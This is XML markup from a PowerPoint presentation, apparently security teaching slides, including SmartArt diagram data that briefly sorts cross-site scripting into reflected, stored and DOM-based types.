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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="328" r:id="rId3"/>
    <p:sldId id="327" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="291" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="395" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="393" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="283" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="396" r:id="rId25"/>
    <p:sldId id="397" r:id="rId26"/>
    <p:sldId id="286" r:id="rId27"/>
    <p:sldId id="280" r:id="rId28"/>
    <p:sldId id="281" r:id="rId29"/>
    <p:sldId id="282" r:id="rId30"/>
    <p:sldId id="398" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="293" r:id="rId34"/>
    <p:sldId id="294" r:id="rId35"/>
    <p:sldId id="295" r:id="rId36"/>
    <p:sldId id="297" r:id="rId37"/>
    <p:sldId id="296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26" r:id="rId46"/>
    <p:sldId id="402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29" r:id="rId58"/>
    <p:sldId id="330" r:id="rId59"/>
    <p:sldId id="332" r:id="rId60"/>
    <p:sldId id="335" r:id="rId61"/>
    <p:sldId id="336" r:id="rId62"/>
    <p:sldId id="337" r:id="rId63"/>
    <p:sldId id="338" r:id="rId64"/>
    <p:sldId id="322" r:id="rId65"/>
    <p:sldId id="315" r:id="rId66"/>
    <p:sldId id="323" r:id="rId67"/>
    <p:sldId id="324" r:id="rId68"/>
    <p:sldId id="350" r:id="rId69"/>
    <p:sldId id="351" r:id="rId70"/>
    <p:sldId id="316" r:id="rId71"/>
    <p:sldId id="317" r:id="rId72"/>
    <p:sldId id="399" r:id="rId73"/>
    <p:sldId id="318" r:id="rId74"/>
    <p:sldId id="400" r:id="rId75"/>
    <p:sldId id="325" r:id="rId76"/>
    <p:sldId id="320" r:id="rId77"/>
    <p:sldId id="321" r:id="rId78"/>
    <p:sldId id="339" r:id="rId79"/>
    <p:sldId id="341" r:id="rId80"/>
    <p:sldId id="342" r:id="rId81"/>
    <p:sldId id="343" r:id="rId82"/>
    <p:sldId id="352" r:id="rId83"/>
    <p:sldId id="353" r:id="rId84"/>
    <p:sldId id="354" r:id="rId85"/>
    <p:sldId id="355" r:id="rId86"/>
    <p:sldId id="356" r:id="rId87"/>
    <p:sldId id="357" r:id="rId88"/>
    <p:sldId id="358" r:id="rId89"/>
    <p:sldId id="359" r:id="rId90"/>
    <p:sldId id="349" r:id="rId91"/>
    <p:sldId id="360" r:id="rId92"/>
    <p:sldId id="340" r:id="rId93"/>
    <p:sldId id="367" r:id="rId94"/>
    <p:sldId id="368" r:id="rId95"/>
    <p:sldId id="369" r:id="rId96"/>
    <p:sldId id="371" r:id="rId97"/>
    <p:sldId id="370" r:id="rId98"/>
    <p:sldId id="372" r:id="rId99"/>
    <p:sldId id="363" r:id="rId100"/>
    <p:sldId id="373" r:id="rId101"/>
    <p:sldId id="375" r:id="rId102"/>
    <p:sldId id="376" r:id="rId103"/>
    <p:sldId id="377" r:id="rId104"/>
    <p:sldId id="378" r:id="rId105"/>
    <p:sldId id="379" r:id="rId106"/>
    <p:sldId id="380" r:id="rId107"/>
    <p:sldId id="401" r:id="rId108"/>
    <p:sldId id="374" r:id="rId109"/>
    <p:sldId id="405" r:id="rId110"/>
    <p:sldId id="404" r:id="rId111"/>
    <p:sldId id="406" r:id="rId112"/>
    <p:sldId id="407" r:id="rId113"/>
    <p:sldId id="381" r:id="rId114"/>
    <p:sldId id="361" r:id="rId115"/>
    <p:sldId id="362" r:id="rId116"/>
    <p:sldId id="364" r:id="rId117"/>
    <p:sldId id="365" r:id="rId118"/>
    <p:sldId id="366" r:id="rId119"/>
    <p:sldId id="383" r:id="rId120"/>
    <p:sldId id="382" r:id="rId121"/>
    <p:sldId id="384" r:id="rId122"/>
    <p:sldId id="385" r:id="rId123"/>
    <p:sldId id="386" r:id="rId124"/>
    <p:sldId id="388" r:id="rId125"/>
    <p:sldId id="387" r:id="rId126"/>
    <p:sldId id="389" r:id="rId127"/>
    <p:sldId id="390" r:id="rId128"/>
    <p:sldId id="391" r:id="rId129"/>
    <p:sldId id="392" r:id="rId1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D5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34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theme" Target="theme/theme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tableStyles" Target="tableStyle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presProps" Target="pres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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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DD94FF-87D0-470B-9198-21949C57E9C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57426A2-AC58-4816-8880-883B54FE454A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Reflected (Type 1)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6853D0F-147A-4854-9FD8-CC43C18E0980}" type="parTrans" cxnId="{CBAC86C8-A213-4C3C-B39B-150A5E8E3B0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9A4EEA5-553B-47B1-B41F-BC52119FED32}" type="sibTrans" cxnId="{CBAC86C8-A213-4C3C-B39B-150A5E8E3B0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FDC1E05-AF1B-4DF1-88A0-93E2D5D8188F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Code is included as part of a malicious link</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A551C4E7-11CC-4D9A-BBB0-702E1752BAC9}" type="parTrans" cxnId="{CB921874-F5A0-4611-B47F-E881EAF003C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69CB5742-E4F7-455C-8A8C-AE11B8684DB6}" type="sibTrans" cxnId="{CB921874-F5A0-4611-B47F-E881EAF003C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07E50FF8-2DE2-4019-A6E6-9EEFB15C0897}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Code included in page rendered by visiting link</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D363944-CC78-4DE5-9C33-32CE7FB0E8B2}" type="parTrans" cxnId="{8F14C9CE-E0AE-403B-856D-01A26EE0AFF0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D879BE3-03ED-4D41-B202-101112C4C0EE}" type="sibTrans" cxnId="{8F14C9CE-E0AE-403B-856D-01A26EE0AFF0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0251544-F387-400A-831B-E71BD8EC14C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Stored (Type 2)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B42687A-E26D-4061-AFC8-D3AE7A3DC44E}" type="parTrans" cxnId="{36506114-E5E4-45C1-B3A4-B0A4939B8394}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F4B530A-AB53-405C-8FFD-8512548069D3}" type="sibTrans" cxnId="{36506114-E5E4-45C1-B3A4-B0A4939B8394}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DF7D40B-A2AA-4A7B-B6F1-53A6E649DE82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Attacker submits malicious code to server</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21370E2B-2FBD-4A50-83C5-FE7CEEA3D279}" type="parTrans" cxnId="{90D3EDD3-4ADF-4A01-AA0C-9EF518A02E22}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBB14653-3B15-4BF2-9D12-FF87A14E9C0D}" type="sibTrans" cxnId="{90D3EDD3-4ADF-4A01-AA0C-9EF518A02E22}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B069313C-1374-4E05-B461-4D9C3609905F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Server app persists malicious code to storage</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BDFAD4F-F0E2-4306-8419-27823AA4A4C0}" type="parTrans" cxnId="{DE71A31D-AD36-4680-B8F3-D45863C370BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A1134E1-DC61-4121-8502-D1B6F726C866}" type="sibTrans" cxnId="{DE71A31D-AD36-4680-B8F3-D45863C370BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71662E46-CC3B-4183-8CED-61B383165C05}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Victim accesses page that includes stored code</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{600CE5FB-9328-4391-8101-2C13747CF5AE}" type="parTrans" cxnId="{ED700F8A-E74D-49B5-87F1-2B42C378D77F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{516B91A1-34EA-4457-B14D-CABD96BFCBC9}" type="sibTrans" cxnId="{ED700F8A-E74D-49B5-87F1-2B42C378D77F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C163D7EF-8E88-428C-A540-8908CECE1417}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>DOM-based (Type 3)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85F322A1-3931-4F09-BAB8-36D4AC31D645}" type="parTrans" cxnId="{4214C495-2E92-4D62-970E-ADB94A1D2C7E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A843156-32CB-4FC0-8B57-0F787788A830}" type="sibTrans" cxnId="{4214C495-2E92-4D62-970E-ADB94A1D2C7E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2EC96627-1FEB-4824-9F24-66287D20F53A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Purely client-side injection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D682467D-86CC-4585-A695-7F46493CF551}" type="parTrans" cxnId="{230F8AB8-91DF-4B65-9E69-779F320F953B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D1250C1-6E59-4C2E-8545-F59DF73855C9}" type="sibTrans" cxnId="{230F8AB8-91DF-4B65-9E69-779F320F953B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2732FFB1-C6D5-4ED1-AF34-BF8996F0198F}" type="pres">
      <dgm:prSet presAssocID="{54DD94FF-87D0-470B-9198-21949C57E9C8}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB406E40-524C-4D70-9E47-0E49C9F2B3B4}" type="pres">
      <dgm:prSet presAssocID="{657426A2-AC58-4816-8880-883B54FE454A}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0CB9ACE7-2AFC-495C-809D-A6B736A735A3}" type="pres">
      <dgm:prSet presAssocID="{657426A2-AC58-4816-8880-883B54FE454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EF19BD63-E329-4576-9266-5EFCDAFDAA7F}" type="pres">
      <dgm:prSet presAssocID="{657426A2-AC58-4816-8880-883B54FE454A}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0C688E95-C8E7-4E8F-9244-0F3B068B9BF0}" type="pres">
      <dgm:prSet presAssocID="{E9A4EEA5-553B-47B1-B41F-BC52119FED32}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EABAA7E2-241D-42A6-A931-452C2FF33F62}" type="pres">
      <dgm:prSet presAssocID="{F0251544-F387-400A-831B-E71BD8EC14C3}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AB9A6962-60CA-453B-94B8-1C4188597BDD}" type="pres">
      <dgm:prSet presAssocID="{F0251544-F387-400A-831B-E71BD8EC14C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3D1B395E-FAEA-48FE-B8EB-7CE7174C2198}" type="pres">
      <dgm:prSet presAssocID="{F0251544-F387-400A-831B-E71BD8EC14C3}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5D2DC76-B2E8-4A7A-9F50-004E380D6240}" type="pres">
      <dgm:prSet presAssocID="{3F4B530A-AB53-405C-8FFD-8512548069D3}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6DD419C0-549E-4429-8D0B-E0A453F69B57}" type="pres">
      <dgm:prSet presAssocID="{C163D7EF-8E88-428C-A540-8908CECE1417}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A77957A1-B775-4737-9927-F68EE564A33F}" type="pres">
      <dgm:prSet presAssocID="{C163D7EF-8E88-428C-A540-8908CECE141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1360B2EC-EFB3-453E-9353-5DEB5BE5A143}" type="pres">
      <dgm:prSet presAssocID="{C163D7EF-8E88-428C-A540-8908CECE1417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36506114-E5E4-45C1-B3A4-B0A4939B8394}" srcId="{54DD94FF-87D0-470B-9198-21949C57E9C8}" destId="{F0251544-F387-400A-831B-E71BD8EC14C3}" srcOrd="1" destOrd="0" parTransId="{2B42687A-E26D-4061-AFC8-D3AE7A3DC44E}" sibTransId="{3F4B530A-AB53-405C-8FFD-8512548069D3}"/>
    <dgm:cxn modelId="{DE71A31D-AD36-4680-B8F3-D45863C370BD}" srcId="{F0251544-F387-400A-831B-E71BD8EC14C3}" destId="{B069313C-1374-4E05-B461-4D9C3609905F}" srcOrd="1" destOrd="0" parTransId="{4BDFAD4F-F0E2-4306-8419-27823AA4A4C0}" sibTransId="{4A1134E1-DC61-4121-8502-D1B6F726C866}"/>
    <dgm:cxn modelId="{56777E2C-238F-4F87-9BFB-A60AF9F72F73}" type="presOf" srcId="{C163D7EF-8E88-428C-A540-8908CECE1417}" destId="{A77957A1-B775-4737-9927-F68EE564A33F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{A7AE152E-32C1-4C88-80CB-9DDBB5ACA7DB}" type="presOf" srcId="{1DF7D40B-A2AA-4A7B-B6F1-53A6E649DE82}" destId="{3D1B395E-FAEA-48FE-B8EB-7CE7174C2198}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{CB921874-F5A0-4611-B47F-E881EAF003C2}" srcId="{657426A2-AC58-4816-8880-883B54FE454A}" destId="{1FDC1E05-AF1B-4DF1-88A0-93E2D5D8188F}" srcOrd="0" destOrd="0" parTransId="{A551C4E7-11CC-4D9A-BBB0-702E1752BAC9}" sibTransId="{69CB5742-E4F7-455C-8A8C-AE11B8684DB6}"/>
    <dgm:cxn modelId="{8FDBC375-6917-4B35-A6A6-77E391B77A98}" type="presOf" srcId="{71662E46-CC3B-4183-8CED-61B383165C05}" destId="{3D1B395E-FAEA-48FE-B8EB-7CE7174C2198}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{BD29A682-E4F1-4AEA-A340-15DDC1579A2D}" type="presOf" srcId="{F0251544-F387-400A-831B-E71BD8EC14C3}" destId="{AB9A6962-60CA-453B-94B8-1C4188597BDD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{ED700F8A-E74D-49B5-87F1-2B42C378D77F}" srcId="{F0251544-F387-400A-831B-E71BD8EC14C3}" destId="{71662E46-CC3B-4183-8CED-61B383165C05}" srcOrd="2" destOrd="0" parTransId="{600CE5FB-9328-4391-8101-2C13747CF5AE}" sibTransId="{516B91A1-34EA-4457-B14D-CABD96BFCBC9}"/>
    <dgm:cxn modelId="{72B8938B-E0C0-4232-AC94-5597BBC84AF5}" type="presOf" srcId="{657426A2-AC58-4816-8880-883B54FE454A}" destId="{0CB9ACE7-2AFC-495C-809D-A6B736A735A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{1657A690-DA4A-469E-8370-0F131863A4FE}" type="presOf" srcId="{B069313C-1374-4E05-B461-4D9C3609905F}" destId="{3D1B395E-FAEA-48FE-B8EB-7CE7174C2198}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{4214C495-2E92-4D62-970E-ADB94A1D2C7E}" srcId="{54DD94FF-87D0-470B-9198-21949C57E9C8}" destId="{C163D7EF-8E88-428C-A540-8908CECE1417}" srcOrd="2" destOrd="0" parTransId="{85F322A1-3931-4F09-BAB8-36D4AC31D645}" sibTransId="{6A843156-32CB-4FC0-8B57-0F787788A830}"/>
    <dgm:cxn modelId="{7E9163A3-0264-4669-AF21-3217D49EDC10}" type="presOf" srcId="{2EC96627-1FEB-4824-9F24-66287D20F53A}" destId="{1360B2EC-EFB3-453E-9353-5DEB5BE5A143}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{230F8AB8-91DF-4B65-9E69-779F320F953B}" srcId="{C163D7EF-8E88-428C-A540-8908CECE1417}" destId="{2EC96627-1FEB-4824-9F24-66287D20F53A}" srcOrd="0" destOrd="0" parTransId="{D682467D-86CC-4585-A695-7F46493CF551}" sibTransId="{4D1250C1-6E59-4C2E-8545-F59DF73855C9}"/>
    <dgm:cxn modelId="{CBAC86C8-A213-4C3C-B39B-150A5E8E3B0D}" srcId="{54DD94FF-87D0-470B-9198-21949C57E9C8}" destId="{657426A2-AC58-4816-8880-883B54FE454A}" srcOrd="0" destOrd="0" parTransId="{B6853D0F-147A-4854-9FD8-CC43C18E0980}" sibTransId="{E9A4EEA5-553B-47B1-B41F-BC52119FED32}"/>
    <dgm:cxn modelId="{8F14C9CE-E0AE-403B-856D-01A26EE0AFF0}" srcId="{657426A2-AC58-4816-8880-883B54FE454A}" destId="{07E50FF8-2DE2-4019-A6E6-9EEFB15C0897}" srcOrd="1" destOrd="0" parTransId="{1D363944-CC78-4DE5-9C33-32CE7FB0E8B2}" sibTransId="{6D879BE3-03ED-4D41-B202-101112C4C0EE}"/>
    <dgm:cxn modelId="{90D3EDD3-4ADF-4A01-AA0C-9EF518A02E22}" srcId="{F0251544-F387-400A-831B-E71BD8EC14C3}" destId="{1DF7D40B-A2AA-4A7B-B6F1-53A6E649DE82}" srcOrd="0" destOrd="0" parTransId="{21370E2B-2FBD-4A50-83C5-FE7CEEA3D279}" sibTransId="{BBB14653-3B15-4BF2-9D12-FF87A14E9C0D}"/>
    <dgm:cxn modelId="{8C716AD8-08A7-4F8B-A3FE-F9BEFDF00ED4}" type="presOf" srcId="{07E50FF8-2DE2-4019-A6E6-9EEFB15C0897}" destId="{EF19BD63-E329-4576-9266-5EFCDAFDAA7F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{F9E867DB-FB4B-4B72-BCA9-97AD6640F204}" type="presOf" srcId="{1FDC1E05-AF1B-4DF1-88A0-93E2D5D8188F}" destId="{EF19BD63-E329-4576-9266-5EFCDAFDAA7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{20819FDF-FCCD-407F-AC2A-7B08338179C5}" type="presOf" srcId="{54DD94FF-87D0-470B-9198-21949C57E9C8}" destId="{2732FFB1-C6D5-4ED1-AF34-BF8996F0198F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{A8FAA0D5-E90F-49AF-971D-70E8DD6F0B8E}" type="presParOf" srcId="{2732FFB1-C6D5-4ED1-AF34-BF8996F0198F}" destId="{EB406E40-524C-4D70-9E47-0E49C9F2B3B4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{EAE619CF-6C6D-4716-A3A6-25EAF40A9D67}" type="presParOf" srcId="{EB406E40-524C-4D70-9E47-0E49C9F2B3B4}" destId="{0CB9ACE7-2AFC-495C-809D-A6B736A735A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{92443E20-3C17-4DD4-852D-D6CD4F3E37B4}" type="presParOf" srcId="{EB406E40-524C-4D70-9E47-0E49C9F2B3B4}" destId="{EF19BD63-E329-4576-9266-5EFCDAFDAA7F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{C0DAEF7A-1F91-456B-B7EF-37E3C315B112}" type="presParOf" srcId="{2732FFB1-C6D5-4ED1-AF34-BF8996F0198F}" destId="{0C688E95-C8E7-4E8F-9244-0F3B068B9BF0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{552D3B1F-8CA6-440F-A5CE-D4613F6AF48E}" type="presParOf" srcId="{2732FFB1-C6D5-4ED1-AF34-BF8996F0198F}" destId="{EABAA7E2-241D-42A6-A931-452C2FF33F62}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{CFF12BE6-06AE-45F7-B028-F86A6DEA62CE}" type="presParOf" srcId="{EABAA7E2-241D-42A6-A931-452C2FF33F62}" destId="{AB9A6962-60CA-453B-94B8-1C4188597BDD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{60922D32-244C-4F8B-BBF1-642E53B759D8}" type="presParOf" srcId="{EABAA7E2-241D-42A6-A931-452C2FF33F62}" destId="{3D1B395E-FAEA-48FE-B8EB-7CE7174C2198}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{AF26FC1A-A7EC-4627-AC51-43A795427D75}" type="presParOf" srcId="{2732FFB1-C6D5-4ED1-AF34-BF8996F0198F}" destId="{D5D2DC76-B2E8-4A7A-9F50-004E380D6240}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{F78D1319-1D94-45F8-A179-E3E0DCF90CEC}" type="presParOf" srcId="{2732FFB1-C6D5-4ED1-AF34-BF8996F0198F}" destId="{6DD419C0-549E-4429-8D0B-E0A453F69B57}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{E6A0F2B1-0916-4A36-8FC7-0D8951B4BC86}" type="presParOf" srcId="{6DD419C0-549E-4429-8D0B-E0A453F69B57}" destId="{A77957A1-B775-4737-9927-F68EE564A33F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{0D30FA92-EB18-43EF-A8D1-39B1168257B9}" type="presParOf" srcId="{6DD419C0-549E-4429-8D0B-E0A453F69B57}" destId="{1360B2EC-EFB3-453E-9353-5DEB5BE5A14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306FC0-B84E-471B-A4DE-E0F4D1DE5515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86FBC66-753A-4938-A9BD-9BFE186FC996}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="1"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Compiler is not hardened</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9010073-0584-44D1-8EA5-E48B049F032D}" type="parTrans" cxnId="{78E9228D-41FF-479F-B7BC-1B975FD95399}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
